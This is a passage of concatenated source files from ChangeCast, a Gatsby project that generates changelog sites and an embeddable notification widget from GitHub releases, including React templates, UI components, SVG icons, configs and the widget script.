import { getOgImageSrc } from '../utils/data'
const ReleasesTemplate = ({
data,
data: {
releases: { edges },
},
pageContext: { isWidget },
}) => {
const Provider = isWidget ? WidgetProvider : SiteProvider
const Wrapper = isWidget ? WidgetWrapper : SiteWrapper
const ogImageSrc = getOgImageSrc(data)
const [releases, setReleases] = React.useState(edges)
const [releasesShown, setReleasesShown] = React.useState(10)
const [searchValue, setSearchValue] = React.useState('')
const search = React.useRef(null)
function getReleaseSearch() {
if (search.current !== null) {
return search.current
}
const releaseSearch = new Search(['node', 'id'])
releaseSearch.searchIndex = new UnorderedSearchIndex()
releaseSearch.addIndex(['node', 'name'])
releaseSearch.addIndex(['node', 'tagName'])
releaseSearch.addIndex([
'node',
'childGithubReleaseBody',
'childMarkdownRemark',
'plainText',
])
releaseSearch.addDocuments(edges)
const debouncedReleaseSearch = debounce(value => {
setReleases(!!value ? releaseSearch.search(value) : edges)
}, 100)
search.current = value => {
setSearchValue(value)
debouncedReleaseSearch(value)
}
return search.current
}
const mark = React.useRef()
React.useEffect(() => {
if (mark.current) {
mark.current.unmark()
}
mark.current = new Mark(document.querySelectorAll('.release'))
mark.current.mark(searchValue)
}, [releases])
const {
faviconElements,
primaryColor,
logoSrc,
title,
description,
homepage,
url,
htmlUrl,
} = useSiteSetup()
const siteTitle = `${title} changelog`
const ogImage = `${url}${ogImageSrc}`
return (
<Provider>
<Favicons favicons={faviconElements} />
<Global styles={globalStyles} />
<FocusStyles />
<Helmet
title={siteTitle}
meta={[
{ name: 'description', content: description },
{ property: 'og:title', content: siteTitle },
{
property: 'og:url',
content: url,
},
{
property: 'og:image',
content: ogImage,
},
{ name: 'twitter:card', content: 'summary_large_image' },
{
name: 'twitter:url',
content: url,
},
{ name: 'twitter:title', content: siteTitle },
{
name: 'twitter:image',
content: ogImage,
},
]}
/>
<Header
homepage={homepage}
htmlUrl={htmlUrl}
setSearchValue={getReleaseSearch()}
searchValue={searchValue}
logoSrc={logoSrc}
primaryColor={primaryColor}
isWidget={isWidget}
/>
<Wrapper>
{releases.length === 0 ? (
<div
css={{
display: 'flex',
justifyContent: 'center',
textAlign: 'center',
padding: '2rem',
}}
>
We couldn't find any releases, try a different search query.
</div>
) : (
releases
.slice(0, releasesShown)
.map(
({
node: {
id,
name,
tagName,
publishedAt,
childGithubReleaseBody: {
childMarkdownRemark: { html, plainText },
},
},
}) => (
<Release
key={id}
releaseName={name}
tagName={tagName}
publishedAt={publishedAt}
html={html}
plainText={plainText}
isWidget={isWidget}
primaryColor={primaryColor}
url={url}
searchValue={searchValue}
id={id}
/>
)
)
)}
<WidgetContext.Consumer>
{isOpen =>
isOpen &&
releasesShown < releases.length && (
<Waypoint
onEnter={() => setReleasesShown(count => count + 10)}
bottomOffset="-100%"
/>
)
}
</WidgetContext.Consumer>
</Wrapper>
</Provider>
)
}
export const query = graphql`
query ReleasesTemplateQuery($ogText: String!) {
repository: allGithubRepo {
edges {
node {
avatarImageFile: childFile {
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
}
}
logo: allFile(filter: { name: { eq: "logo" } }) {
edges {
node {
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
}
releases: allGithubRelease(filter: { draft: { eq: false } }) {
edges {
node {
id
name
tagName
publishedAt
childGithubReleaseBody {
childMarkdownRemark {
html
plainText
}
}
}
}
}
}
`
export default ReleasesTemplate
<|start_filename|>site/src/components/SiteWrapper.js<|end_filename|>
import React from 'react'
import { theme } from '../styles/theme'
export const SiteWrapper = React.forwardRef(({ children }, ref) => (
<main
ref={ref}
css={{
maxWidth: 800,
margin: '0 auto',
width: '100vw',
paddingTop: '4rem',
[theme.media.small]: {
padding: 'calc(0.5rem + 54px) 0.5rem 0.5rem 0.5rem',
},
}}
>
{children}
</main>
))
<|start_filename|>icons/AbstractIcon7.js<|end_filename|>
import React from 'react'
export const AbstractIcon7 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<path
fill="#4D61FC"
d="M28.686 14.008l-9 9.085-3.6-3.6-1.2 1.2 4.8 4.8L29.97 15.208z"
/>
<path
d="M25.086 16.208l-1.2-1.2-5.4 5.4 1.2 1.2 5.4-5.4zM11 20.693l4.8 4.8 1.2-1.2-4.8-4.8-1.2 1.2z"
fill="#00396B"
fillRule="nonzero"
/>
</g>
</svg>
)
<|start_filename|>icons/AbstractIcon2.js<|end_filename|>
import React from 'react'
export const AbstractIcon2 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<defs>
<path id="AbstractIcon2_svg__a" d="M4 4h6v6H4z" />
</defs>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g transform="translate(13 13)">
<path fill="#4D61FC" d="M8 0h6v6H8zM0 8h6v6H0z" />
<use fill="#00396B" xlinkHref="#AbstractIcon2_svg__a" />
<path stroke="#E9F1FF" d="M3.5 3.5h7v7h-7z" />
</g>
</g>
</svg>
)
<|start_filename|>site/gatsby-config.js<|end_filename|>
const path = require('path')
const hexRgb = require('hex-rgb')
const { config } = require('dotenv')
config({ path: path.resolve('..', '.env') })
module.exports = {
siteMetadata: generateMetadata(),
plugins: [
'gatsby-plugin-emotion',
'gatsby-plugin-react-helmet',
'gatsby-plugin-sharp',
{
resolve: `gatsby-plugin-typography`,
options: {
pathToConfigModule: `src/styles/typography`,
},
},
{
resolve: 'gatsby-source-github-releases',
options: {
url: process.env.REPO_URL,
token: process.env.GITHUB_TOKEN,
},
},
'gatsby-transformer-json',
'gatsby-transformer-sharp',
'gatsby-transformer-color-thief',
{
resolve: 'gatsby-transformer-og-image',
options: {
fontPath: '../fonts/Inter-SemiBold.woff',
fontColor: '#24292e',
backgroundColor: '#f7f7f7',
},
},
'gatsby-transformer-favicons',
{
resolve: 'gatsby-transformer-remark',
options: {
plugins: [
{ resolve: 'gatsby-remark-images', options: { maxWidth: 800 } },
'gatsby-remark-prismjs',
'gatsby-remark-external-links',
'gatsby-remark-gemoji-to-emoji',
'gatsby-transformer-remark-plaintext',
],
},
},
],
}
function generateMetadata() {
// default to false for each since undefined fields cannot be queried
return {
title: process.env.SITE_TITLE || false,
primaryColor: process.env.PRIMARY_COLOR
? hexRgb(process.env.PRIMARY_COLOR, { format: 'array' })
: false,
url: process.env.DEPLOY_URL || process.env.URL || '',
}
}
<|start_filename|>icons/Link.js<|end_filename|>
import React from 'react'
export const Link = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Link_svg__feather Link_svg__feather-link"
{...props}
>
<path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71" />
<path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71" />
</svg>
)
<|start_filename|>site/src/utils/data.js<|end_filename|>
export function getPrimaryColor(data) {
if (data.site.siteMetadata.primaryColor) {
return data.site.siteMetadata.primaryColor
}
if (data.logo.edges[0]) {
return data.logo.edges[0].node.fields.colorPalette[0]
}
return data.repository.edges[0].node.avatarImageFile.fields.colorPalette[0]
}
export function getOgImageSrc(data) {
if (data.logo.edges[0]) {
return data.logo.edges[0].node.childOgImage.ogImageWithText.src
}
return data.repository.edges[0].node.avatarImageFile.childOgImage
.ogImageWithText.src
}
export function getLogoSrc(data) {
if (data.logo.edges[0]) {
return data.logo.edges[0].node.childImageSharp.original.src
}
return data.repository.edges[0].node.avatarImageFile.childImageSharp.original
.src
}
export function getTitle(data) {
if (data.site.siteMetadata.title) {
return data.site.siteMetadata.title
}
return data.repository.edges[0].node.name
}
export function getFaviconElements(data) {
if (data.logo.edges[0]) {
return data.logo.edges[0].node.childFavicon.faviconElements
}
return data.repository.edges[0].node.avatarImageFile.childFavicon
.faviconElements
}
<|start_filename|>docs/src/components/Anchor.js<|end_filename|>
import React from 'react'
export const Anchor = ({ children, ...props }) => (
<a
css={{ color: 'royalblue', ':visited': { color: 'royalblue' } }}
{...props}
>
{children}
</a>
)
<|start_filename|>docs/src/styles/global.js<|end_filename|>
import { css } from '@emotion/core'
import 'normalize.css'
import { fonts } from './typography'
export const globalStyles = css`
* {
box-sizing: border-box;
margin: 0;
padding: 0;
}
html {
height: 100%;
font-family: ${fonts.regular}, sans-serif;
font-style: normal;
line-height: 1.15;
text-rendering: optimizeLegibility;
-webkit-text-size-adjust: 100%;
-ms-text-size-adjust: 100%;
-ms-overflow-style: scrollbar;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
*::-moz-selection,
*::-moz-selection {
color: white;
background-color: #4d61fc;
}
*::-moz-selection,
*::selection {
color: white;
background-color: #4d61fc;
}
body {
background-color: white;
color: #3d3d3d;
}
body.state-fixed-body {
overflow: hidden;
}
p {
margin-bottom: 1em;
margin-top: 1em;
line-height: 1.4;
}
hr {
box-sizing: content-box;
height: 0;
overflow: visible;
}
input,
button,
select,
optgroup,
textarea {
margin: 0;
}
button,
input {
border: none;
background: none;
overflow: visible;
}
button {
border-radius: 0;
}
h1,
h2,
h3,
h4,
h5,
h6 {
margin-bottom: 0.5em;
margin-top: 0.5em;
line-height: 1.3;
color: #303030;
}
`
<|start_filename|>icons/Clipboard.js<|end_filename|>
import React from 'react'
export const Clipboard = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Clipboard_svg__feather Clipboard_svg__feather-clipboard"
{...props}
>
<path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2" />
<rect x={8} y={2} width={8} height={4} rx={1} ry={1} />
</svg>
)
<|start_filename|>widget/src/widget.js<|end_filename|>
import createFocusTrap from 'focus-trap'
import { fetch } from 'whatwg-fetch'
import * as styles from './styles.css'
// configuration
const CHANGECAST_LOCALSTORAGE_KEY = `changecast-${process.env.REPO_HASH}`
const changeCastHost =
process.env.DEPLOY_URL ||
process.env.URL ||
document.currentScript.getAttribute('src').replace('/widget.js', '')
// find all toggles
const toggleSelectors =
document.currentScript.getAttribute('data-selectors') ||
'[data-toggle-changecast]'
const toggles = document.querySelectorAll(toggleSelectors)
function createWidget() {
// bail early if the widget has already been created
if (document.querySelector(styles.iframe)) {
return
}
// add click handlers to toggles
toggles.forEach(toggle => toggle.addEventListener('click', toggleChangeCast))
// create overlay
const overlay = document.createElement('div')
// create iframe
const iframe = document.createElement('iframe')
iframe.src = `${changeCastHost}/widget`
iframe.allowFullscreen = true
iframe.scrolling = 'no'
iframe.tabIndex = 0
iframe.setAttribute('role', 'dialog')
iframe.setAttribute('aria-label', 'ChangeCast Changelog')
iframe.setAttribute('aria-hidden', true)
iframe.setAttribute('tabindex', -1)
// hide overlay and iframe to start
overlay.className = `${styles.overlay} ${styles.overlayHidden}`
iframe.className = `${styles.iframe} ${styles.iframeHidden}`
document.body.appendChild(overlay)
document.body.appendChild(iframe)
let focusTrap = createFocusTrap(iframe, {
initialFocus: iframe,
})
// shared state
let open = false
let toggleNotifications = new Map()
function openChangeCast() {
open = true
iframe.contentWindow.postMessage('open', '*')
overlay.className = `${styles.overlay} ${styles.overlayOpen}`
iframe.className = `${styles.iframe} ${styles.iframeOpen}`
iframe.setAttribute('aria-hidden', false)
iframe.removeAttribute('tabindex')
focusTrap.activate()
window.addEventListener('click', toggleChangeCast, true)
window.localStorage.setItem(
CHANGECAST_LOCALSTORAGE_KEY,
new Date().toISOString()
)
if (toggleNotifications.size) {
toggles.forEach(toggle => {
toggle.removeChild(toggleNotifications.get(toggle))
toggleNotifications.delete(toggle)
})
}
}
function closeChangeCast() {
open = false
focusTrap.deactivate()
window.removeEventListener('click', toggleChangeCast, true)
overlay.className = styles.overlay
iframe.className = styles.iframe
iframe.setAttribute('aria-hidden', true)
iframe.setAttribute('tabindex', -1)
setTimeout(() => {
overlay.className = `${styles.overlay} ${styles.overlayHidden}`
iframe.className = `${styles.iframe} ${styles.iframeHidden}`
iframe.contentWindow.postMessage('close', '*')
}, 400)
}
function toggleChangeCast() {
if (open) {
closeChangeCast()
} else {
openChangeCast()
}
}
// listen for close events from the iframe
window.addEventListener(
'message',
event => {
if (event.origin === changeCastHost) {
closeChangeCast()
}
},
true
)
// notifications
const notification = document.createElement('span')
notification.setAttribute('data-changecast-notification', true)
notification.className = styles.notification
const toggleStyle = document.createElement('style')
document.head.appendChild(toggleStyle)
toggleStyle.sheet.insertRule(`${toggleSelectors} { position: relative; }`)
fetch(`${changeCastHost}/release-dates.json`)
.then(
res => res.json(),
err => {
// swallow error
}
)
.then(dates => {
const lastViewed = window.localStorage.getItem(
CHANGECAST_LOCALSTORAGE_KEY
)
if (lastViewed) {
const lastViewedDate = new Date(lastViewed)
const lastViewedIndex = dates.findIndex(
date => new Date(date) <= lastViewedDate
)
const count = lastViewedIndex === -1 ? dates.length : lastViewedIndex
if (count > 0) {
notification.innerHTML = count > 9 ? `9+` : count
toggles.forEach(toggle => {
const notificationCopy = notification.cloneNode(true)
toggleNotifications.set(toggle, notificationCopy)
toggle.appendChild(notificationCopy)
})
}
} else {
window.localStorage.setItem(
CHANGECAST_LOCALSTORAGE_KEY,
new Date().toISOString()
)
}
})
}
window.addEventListener('load', createWidget)
<|start_filename|>icons/Facebook.js<|end_filename|>
import React from 'react'
export const Facebook = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Facebook_svg__feather Facebook_svg__feather-facebook"
{...props}
>
<path d="M18 2h-3a5 5 0 0 0-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 0 1 1-1h3z" />
</svg>
)
<|start_filename|>docs/src/components/Feature.js<|end_filename|>
import React from 'react'
export const Feature = ({ title, icon: Icon, children }) => (
<li
css={{
width: '30%',
maxWidth: 350,
marginBottom: 60,
padding: '0 15px',
'@media (max-width: 990px)': {
width: '50%',
},
'@media (max-width: 600px)': {
width: '100%',
},
}}
>
<h3
css={{
marginTop: '0',
marginBottom: 15,
}}
>
<span
css={{
fontSize: '1rem',
}}
>
{title}
</span>
</h3>
<p
css={{
margin: 'auto',
}}
>
{children}
</p>
</li>
)
<|start_filename|>site/src/utils/windowPopup.js<|end_filename|>
export function windowPopup(url, width, height) {
// Calculate the position of the popup so
// it’s centered on the screen.
var left = window.screen.width / 2 - width / 2,
top = window.screen.height / 2 - height / 2
window.open(
url,
'',
'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,width=' +
width +
',height=' +
height +
',top=' +
top +
',left=' +
left
)
}
<|start_filename|>docs/gatsby-browser.js<|end_filename|>
exports.onClientEntry = () => {
const oneMonthAgo = new Date()
oneMonthAgo.setMonth(oneMonthAgo.getMonth() - 1)
const oneMonthAgoISO = oneMonthAgo.toISOString()
window.localStorage.setItem('changecast-077d7', oneMonthAgoISO)
window.localStorage.setItem('changecast-2c277', oneMonthAgoISO)
window.localStorage.setItem('changecast-ff975', oneMonthAgoISO)
}
<|start_filename|>icons/AbstractIcon1.js<|end_filename|>
import React from 'react'
export const AbstractIcon1 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<path fill="#4D61FC" d="M13 13h6v6h-6zM21 13h6v6h-6zm-8 8h6v6h-6z" />
<path fill="#00396B" d="M21 21h6v6h-6z" />
</g>
</svg>
)
<|start_filename|>site/src/providers/SiteProvider.js<|end_filename|>
import React from 'react'
import { CHANGECAST_LOCALSTORAGE_KEY } from '../utils/constants'
export const SiteProvider = ({ children }) => {
React.useEffect(() => {
window.localStorage.setItem(
CHANGECAST_LOCALSTORAGE_KEY,
new Date().toISOString()
)
}, [])
return children
}
<|start_filename|>docs/src/templates/IndexTemplate.js<|end_filename|>
import { Global } from '@emotion/core'
import { graphql } from 'gatsby'
import React from 'react'
import Helmet from 'react-helmet'
import { Anchor } from '../components/Anchor'
import { ButtonContainer } from '../components/Button/ButtonContainer'
import { GlowingAnchorButton } from '../components/Button/GlowingAnchorButton'
import { GlowingButton } from '../components/Button/GlowingButton'
import { CenteredText } from '../components/CenteredText'
import { CenteredTitle } from '../components/CenteredTitle'
import { Favicons } from '../components/Favicons'
import { Feature } from '../components/Feature'
import { Features } from '../components/Features'
import { FocusStyles } from '../components/FocusStyles'
import { Footer } from '../components/Footer'
import { Header } from '../components/Header'
import { Section } from '../components/Section'
import { globalStyles } from '../styles/global'
const url = 'https://changecast.now.sh'
const title = 'ChangeCast'
const description =
'Create beautiful, performant, accessible changelogs from your Github releases.'
const IndexTemplate = ({
data: {
site: {
siteMetadata: {
exampleSiteUrls: [reactBeautifulDndUrl, materialUiUrl, workboxUrl],
},
},
logo: {
childFavicon: { faviconElements },
childOgImage: {
ogImageWithText: { src: ogImgSrc },
},
},
},
}) => (
<>
<FocusStyles />
<Global styles={globalStyles} />
<Favicons favicons={faviconElements} />
<Helmet
title={title}
meta={[
{ property: 'og:title', content: title },
{ name: 'description', content: description },
{
property: 'og:url',
content: url,
},
{
property: 'og:image',
content: `${url}${ogImgSrc}`,
},
{
name: 'twitter:url',
content: url,
},
{ name: 'twitter:title', content: title },
{
name: 'twitter:image',
content: `${url}${ogImgSrc}`,
},
]}
/>
{(process.env.NODE_ENV === 'development' ||
typeof window === 'undefined') && (
<Helmet>
<script
src={`${reactBeautifulDndUrl}/widget.js`}
data-selectors="[data-react-beautiful-dnd-changecast]"
defer
/>
<script
src={`${materialUiUrl}/widget.js`}
data-selectors="[data-material-ui-changecast]"
defer
/>
<script
src={`${workboxUrl}/widget.js`}
data-selectors="[data-workbox-changecast]"
defer
/>
<script
src="https://changecast-log.netlify.com/widget.js"
data-selectors="[data-changecast-changecast]"
defer
/>
</Helmet>
)}
<Header />
<Section background="black">
<CenteredTitle color="white">How does it work?</CenteredTitle>
<CenteredText color="white">
ChangeCast generates a static site and widget from your Github releases.
Adding these to your project homepage will keep users informed of any
updates you make. Click on the examples below to see ChangeCast in
action!
</CenteredText>
<ButtonContainer>
<GlowingButton
data-react-beautiful-dnd-changecast
css={{
marginRight: 30,
}}
>
React Beautiful DnD
</GlowingButton>
<GlowingButton
data-material-ui-changecast
css={{
marginRight: 30,
}}
>
Material UI
</GlowingButton>
<GlowingButton data-workbox-changecast>Workbox</GlowingButton>
</ButtonContainer>
</Section>
<Section background="white">
<CenteredTitle color="black">What are the features?</CenteredTitle>
<CenteredText color="black">
ChangeCast comes with every feature you need to easily communicate
project updates. If you think something is missing, please{' '}
<Anchor href="https://github.com/palmerhq/changecast/issues/new">
open an issue
</Anchor>
!
</CenteredText>
<Features>
<Feature title="Built-in Widget">
Our widget notifies users of new updates and allows them to view
release notes without leaving your site.
</Feature>
<Feature title="Themeable">
Our site and widget are built with your Github avatar's color scheme
and can be overridden with any color you choose.
</Feature>
<Feature title="Shareable">
Each release comes with it's own shareable link and open graph image
that looks great when shared on social media.
</Feature>
<Feature title="Searchable">
Users can search the text of each release to find the feature or
update they are looking for.
</Feature>
<Feature title="Accessible">
We follow the{' '}
<Anchor href="https://www.w3.org/TR/WCAG21/">
WCAG 2.1 Standard
</Anchor>{' '}
to ensure your project updates can reach everyone.
</Feature>
<Feature title="Blazing Fast">
Built on top of{' '}
<Anchor href="https://www.gatsbyjs.org">Gatsby</Anchor>, your site and
widget are tuned for a fast experience out of the box.
</Feature>
</Features>
</Section>
<Section background="black">
<CenteredTitle color="white">How do I get started?</CenteredTitle>
<CenteredText color="white">
ChangeCast can be built and deployed on{' '}
<Anchor
href="https://www.netlify.com"
css={{ color: 'white', ':visited': { color: 'white' } }}
>
Netlify
</Anchor>
,{' '}
<Anchor
href="https://zeit.co/now"
css={{ color: 'white', ':visited': { color: 'white' } }}
>
Now
</Anchor>
, or any other static hosting service. And, using a Github webhook or
action, you can configure ChangeCast to redeploy whenver you cut a new
release.
</CenteredText>
<div css={{ textAlign: 'center', color: 'white', marginBottom: 30 }}>
<GlowingAnchorButton href="https://github.com/palmerhq/changecast#getting-started">
Get Started
</GlowingAnchorButton>
</div>
</Section>
<Footer />
</>
)
export const query = graphql`
query IndexQuery($ogText: String!) {
site {
siteMetadata {
exampleSiteUrls
}
}
logo: file(relativePath: { eq: "ChangeCastTransparent.png" }) {
childFavicon {
faviconElements {
props
type
}
}
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
`
export default IndexTemplate
<|start_filename|>fonts/fonts.css<|end_filename|>
@font-face {
font-family: 'Inter Regular';
font-style: normal;
font-weight: 400;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-Regular.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter Italic';
font-style: italic;
font-weight: 400;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-Italic.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter SemiBold';
font-style: normal;
font-weight: 600;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-SemiBold.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter SemiBold Italic';
font-style: italic;
font-weight: 600;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-SemiBoldItalic.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter Bold';
font-style: normal;
font-weight: 700;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-Bold.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter Bold Italic';
font-style: italic;
font-weight: 700;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-BoldItalic.woff')
format('woff');
font-display: fallback;
}
<|start_filename|>docs/src/components/Footer.js<|end_filename|>
import { Radio } from 'icons/Radio'
import React from 'react'
import { AnchorButton } from './Button/AnchorButton'
import { Button } from './Button/Button'
import { LinkButton } from './Button/LinkButton'
export const Footer = () => (
<div
css={{
backgroundColor: '#F6F6F6',
}}
>
<div
css={{
marginRight: 'auto',
marginLeft: 'auto',
padding: '0 15px',
maxWidth: '1080px',
}}
>
<div
css={{
padding: '40px 0',
textAlign: 'center',
}}
>
<ul
css={{
padding: '0',
margin: '0',
listStyle: 'none',
}}
>
<li
css={{
marginBottom: '10px',
}}
>
<AnchorButton
href="https://github.com/palmerhq/changecast"
css={{ color: 'black' }}
>
Github
</AnchorButton>
</li>
<li
css={{
marginBottom: '10px',
}}
>
<Button css={{ color: 'black' }} data-changecast-changecast={true}>
What's New?
</Button>
</li>
<li
css={{
display: 'flex',
justifyContent: 'center',
}}
>
<LinkButton
to="/"
css={{
display: 'flex',
alignItems: 'center',
}}
>
<Radio css={{ color: 'black' }} />
<span
css={{
fontWeight: 'bold',
color: 'black',
marginLeft: '1rem',
}}
>
ChangeCast
</span>
</LinkButton>
</li>
</ul>
</div>
</div>
</div>
)
<|start_filename|>docs/gatsby-config.js<|end_filename|>
const path = require('path')
const { config } = require('dotenv')
config({ path: path.resolve('..', '.env') })
module.exports = {
siteMetadata: {
exampleSiteUrls: [
process.env.FIRST_EXAMPLE_URL,
process.env.SECOND_EXAMPLE_URL,
process.env.THIRD_EXAMPLE_URL,
],
},
plugins: [
'gatsby-plugin-emotion',
'gatsby-plugin-react-helmet',
{
resolve: 'gatsby-transformer-og-image',
options: {
fontPath: '../fonts/Inter-SemiBold.woff',
fontColor: '#24292e',
backgroundColor: '#f7f7f7',
},
},
'gatsby-transformer-favicons',
{
resolve: `gatsby-plugin-typography`,
options: {
pathToConfigModule: `src/styles/typography`,
},
},
`gatsby-transformer-sharp`,
`gatsby-plugin-sharp`,
{
resolve: `gatsby-source-filesystem`,
options: {
name: `images`,
path: path.join(__dirname, `src`, `images`),
},
},
{
resolve: `gatsby-plugin-google-analytics`,
options: {
trackingId: 'UA-139165006-1',
},
},
],
}
<|start_filename|>docs/src/components/Button/ButtonContainer.js<|end_filename|>
import React from 'react'
export const ButtonContainer = ({ children }) => (
<div
css={{
padding: '0 15px',
marginLeft: 'auto',
marginRight: 'auto',
textAlign: 'center',
maxWidth: '700px',
display: 'flex',
justifyContent: 'center',
'@media (max-width: 600px)': {
display: 'block',
'> button': {
display: 'block',
margin: '0 auto 30px auto',
},
},
}}
>
{children}
</div>
)
<|start_filename|>docs/src/components/Button/GlowingButton.js<|end_filename|>
import React from 'react'
export const glowingButtonStyles = color => ({
margin: '0',
padding: '12px 20px 12px',
borderRadius: '4px',
backgroundColor: color,
boxShadow: `0 3px 26px -2px ${color}`,
color: 'white',
display: 'inline-block',
cursor: 'pointer',
textDecoration: 'none',
border: 'none',
userSelect: 'none',
transition: 'transform 200ms ease',
':hover': {
transform: 'translateY(-2px)',
},
})
export const GlowingButton = ({ color = 'royalblue', ...props }) => (
<button css={glowingButtonStyles(color)} {...props} />
)
<|start_filename|>site/src/components/Release/SocialButton.js<|end_filename|>
import Tooltip from '@reach/tooltip'
import '@reach/tooltip/styles.css'
import VisuallyHidden from '@reach/visually-hidden'
import React from 'react'
import { theme } from '../../styles/theme'
import { Button } from '../Button/Button'
export const SocialButton = ({ label, icon: Icon, ...rest }) => (
<Tooltip
label={label}
css={{
borderRadius: 3,
border: '1px solid lightgray',
background: 'white',
}}
>
<Button css={{ padding: '0.5rem' }} {...rest}>
<Icon
css={{
height: '1.2rem',
width: '1.2rem',
color: theme.color.accent,
}}
/>
<VisuallyHidden>{label}</VisuallyHidden>
</Button>
</Tooltip>
)
<|start_filename|>site/src/components/Header.js<|end_filename|>
import VisuallyHidden from '@reach/visually-hidden'
import { Link } from 'gatsby'
import { Close } from 'icons/Close'
import { ExternalLink } from 'icons/ExternalLink'
import React from 'react'
import { onClose } from '../providers/WidgetProvider'
import { theme } from '../styles/theme'
import { AnchorButton } from './Button/AnchorButton'
import { Button } from './Button/Button'
export const Header = ({
primaryColor: [red, green, blue],
setSearchValue,
logoSrc,
homepage,
htmlUrl,
searchValue,
isWidget,
}) => (
<header
css={{
position: 'fixed',
background: `rgb(${red}, ${green}, ${blue})`,
color: 'white',
width: '100%',
zIndex: 1,
height: 54,
display: 'flex',
alignItems: 'center',
boxShadow: '0 1px 6px 0 rgba(32,33,36,0.28)',
}}
>
<div
css={{
width: '100%',
maxWidth: 800,
margin: '0 auto',
display: 'flex',
alignItems: 'center',
justifyContent: 'space-between',
padding: '0 0.5rem',
}}
>
{logoSrc && !isWidget && (
<Link to="/" css={{ flexShrink: 0 }}>
<img
src={logoSrc}
alt=""
css={{
display: 'block',
borderRadius: 3,
margin: 0,
background: '#f7f7f7',
height: 34,
width: 34,
border: '2px solid #f7f7f7',
}}
/>
</Link>
)}
<div
css={{
background: 'white',
borderRadius: 34,
flexGrow: 1,
marginLeft: '0.5rem',
position: 'relative',
}}
>
<input
placeholder="Search"
css={{
width: '100%',
background: !!searchValue
? `rgba(${red}, ${green}, ${blue}, 0.1)`
: `rgba(${red}, ${green}, ${blue}, 0.9)`,
border: '1px solid transparent',
borderRadius: '4px',
padding: '0.25rem 2rem 0.25rem 0.75rem',
WebkitAppearance: 'none',
'::placeholder': {
color: 'white',
},
// @todo improve performance by animating opacity
transition: 'background 100ms ease-in, color 100ms 50ms linear',
':focus': {
background: `rgb(${red}, ${green}, ${blue}, 0.1)`,
'::placeholder': {
color: 'inherit',
},
},
}}
value={searchValue}
onChange={({ target: { value } }) => setSearchValue(value)}
/>
{searchValue && (
<Button
onClick={() => setSearchValue('')}
css={{
position: 'absolute',
marginRight: '0.25rem',
borderRadius: '50%',
padding: '0.25rem',
right: 0,
':hover': {
background: 'initial',
},
}}
>
<Close css={{ color: theme.color.accent, width: 22, height: 22 }} />
<VisuallyHidden>Clear search</VisuallyHidden>
</Button>
)}
</div>
{isWidget ? (
<Button
onClick={onClose}
css={{
marginLeft: '0.5rem',
padding: '0.25rem',
}}
>
<Close />
<VisuallyHidden>Close</VisuallyHidden>
</Button>
) : (
<AnchorButton
href={homepage || htmlUrl}
target="_blank"
rel="noopener noreferrer"
css={{ marginLeft: '0.5rem' }}
>
{homepage ? 'Homepage' : 'Github'}
<ExternalLink
css={{
marginLeft: '0.25rem',
height: '1.2rem',
width: '1.2rem',
flexShrink: 0,
}}
/>
</AnchorButton>
)}
</div>
</header>
)
<|start_filename|>docs/src/components/Button/GlowingAnchorButton.js<|end_filename|>
import React from 'react'
import { glowingButtonStyles } from './GlowingButton'
export const GlowingAnchorButton = ({ color = 'royalblue', ...props }) => (
<a css={glowingButtonStyles(color)} {...props} />
)
<|start_filename|>docs/src/components/CenteredTitle.js<|end_filename|>
import React from 'react'
export const CenteredTitle = ({ color, children }) => (
<div
css={{
marginLeft: 'auto',
marginRight: 'auto',
textAlign: 'center',
marginBottom: 15,
maxWidth: 700,
}}
>
<h2
css={{
marginTop: 0,
fontSize: '2em',
color,
}}
>
{children}
</h2>
</div>
)
<|start_filename|>docs/src/components/Link.js<|end_filename|>
import { Link as GatsbyLink } from 'gatsby'
import isAbsoluteURL from 'is-absolute-url'
import React from 'react'
export const Link = ({ href, ...props }) =>
isAbsoluteURL(href || '') ? (
<a href={href} {...props} />
) : (
<GatsbyLink to={href} {...props} activeClassName="active" />
)
<|start_filename|>site/src/templates/ReleaseTemplate.js<|end_filename|>
import { Global } from '@emotion/core'
import { graphql } from 'gatsby'
import { ChevronLeft } from 'icons/ChevronLeft'
import debounce from 'just-debounce-it'
import Mark from 'mark.js'
